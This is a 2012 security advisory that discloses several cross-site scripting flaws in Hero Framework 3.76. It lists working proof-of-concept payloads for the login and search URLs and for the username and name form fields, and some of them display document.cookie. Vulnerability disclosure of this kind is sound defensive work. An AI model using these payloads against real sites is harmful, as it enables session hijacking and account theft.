SSCHADV2012-023 - Hero Framework 3.76 Cross-site Scripting vulnerability
Advisory:
|
Hero Framework 3.76 Multiple Cross-site Scripting vulnerabilities
|
Advisory ID:
|
SSCHADV2012-023
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on Hero Framework 3.76
|
Vendor URL:
|
|
Vendor Status:
|
informed
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
Hero Framework 3.76 is prone to multiple Cross-Site Scripting vulnerabilities
======================
PoC-Exploit
======================
PoC-Exploit
======================
http://[target]/hero_os/users/login?errors=true&username=‘"></style></script><script>alert(document.cookie)</script>
http://[target]/hero_os/search?q=" onmouseover%3dalert(/XSS/) %3d"
http://[target]/hero_os/users/login?errors=true&username=" onmouseover%3dalert(/XSS/) %3d"
|
// POST-Parameter
Username: ‘"><script>alert(document.cookie)</script>
First Name: ‘"><script>alert(document.cookie)</script>
Last Name: ‘"><script>alert(document.cookie)</script>
======================
Solution
======================
Solution
======================
-
======================
Disclosure Timeline
======================
Disclosure Timeline
======================
16-Dec-2012 – informed via contact form
16-Dec-2012 – feedback from vendor
16-Dec-2012 – feedback from vendor
======================
Credits
======================
Credits
======================
Vulnerabilities found and advisory written by Stefan Schurtz.
======================
References
======================
References
======================
Comments
Display comments as Linear | Threaded